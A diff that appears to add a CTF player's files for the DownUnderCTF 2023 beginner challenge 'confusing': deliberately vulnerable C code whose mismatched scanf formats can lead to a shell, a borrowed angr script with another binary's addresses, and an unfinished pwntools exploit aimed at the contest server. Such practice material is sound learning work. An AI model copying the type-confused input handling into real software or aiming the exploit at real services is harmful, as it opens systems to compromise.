downloaded challenges

didnt know they would publish everything

DownUnderCTF 2023/beginner/confusing/README.md

@@ -0,0 +1,45 @@
+# confusing
+
+```
+Types can be very confusing.
+
+Author: joseph
+nc 2023.ductf.dev 30024 
+```
+
+## Source 
+
+```c
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void init() {
+    setvbuf(stdout, 0, 2, 0);
+    setvbuf(stdin, 0, 2, 0);
+}
+
+int main() {
+    init();
+
+    short d;
+    double f;
+    char s[4];
+    int z; 
+
+    printf("Give me d: ");
+    scanf("%lf", &d);
+
+    printf("Give me s: ");
+    scanf("%d", &s);
+
+    printf("Give me f: ");
+    scanf("%8s", &f);
+
+    if(z == -1 && d == 13337 && f == 1.6180339887 && strncmp(s, "FLAG", 4) == 0) {
+        system("/bin/sh");
+    } else {
+        puts("Still confused?");
+    }
+}
+```

DownUnderCTF 2023/beginner/confusing/ape.py

@@ -0,0 +1,34 @@
+import sys
+import angr
+import claripy
+import time
+
+# compiled on ubuntu 18.04 system:
+# https://github.com/b01lers/b01lers-ctf-2020/tree/master/rev/100_little_engine
+success = 0x0010133c
+fail = 0x00101343
+
+
+def main(argv):
+    path_to_binary = argv[1]  # :string
+    project = angr.Project(path_to_binary)
+
+    # Start in main()
+    initial_state = project.factory.entry_state()
+    # Start simulation
+    simulation = project.factory.simgr(initial_state)
+
+    simulation.explore(find=success, avoid=fail)
+
+    # If found a way to reach the address
+    if simulation.found:
+        solution_state = simulation.found[0]
+
+        # Print the string that Angr wrote to stdin to follow solution_state
+        print(solution_state.posix.dumps(sys.stdin.fileno()))
+    else:
+        raise Exception('Could not find the solution')
+
+
+if __name__ == '__main__':
+    main(sys.argv)

DownUnderCTF 2023/beginner/confusing/confusing.c

@@ -0,0 +1,32 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+void init() {
+    setvbuf(stdout, 0, 2, 0);
+    setvbuf(stdin, 0, 2, 0);
+}
+
+int main() {
+    init();
+
+    short d;
+    double f;
+    char s[4];
+    int z; 
+
+    printf("Give me d: ");
+    scanf("%lf", &d);
+
+    printf("Give me s: ");
+    scanf("%d", &s);
+
+    printf("Give me f: ");
+    scanf("%8s", &f);
+
+    if(z == -1 && d == 13337 && f == 1.6180339887 && strncmp(s, "FLAG", 4) == 0) {
+        system("/bin/sh");
+    } else {
+        puts("Still confused?");
+    }
+}

DownUnderCTF 2023/beginner/confusing/confusing.py

@@ -0,0 +1,35 @@
+from pwn import *
+import os
+
+os.environ["PWNLIB_DEBUG"] = "1"
+
+gs = '''
+unset env LINES
+unset env COLUMNS
+set follow-fork-mode child
+# br *main+78 # first scanf
+br *main+160
+br *main+170
+br *main+220
+c
+'''
+
+elf = ELF(os.getcwd()+"/confusing")
+
+def start():
+    if args.GDB:
+        return gdb.debug(elf.path, gs)
+    if args.REMOTE:
+        return remote("2023.ductf.dev", 30024)
+    else:
+        return process(elf.path)
+
+while True:
+    io = start()
+    print(io.recvuntil(b"Give me d: "))
+    io.sendline(b"7")
+    print(io.recvuntil(b"Give me s: "))
+    io.sendline(b"FLAG")# + b"\xff"*4)
+    print(io.recvuntil(b"Give me f: "))
+    io.sendline(b"2")
+    io.interactive()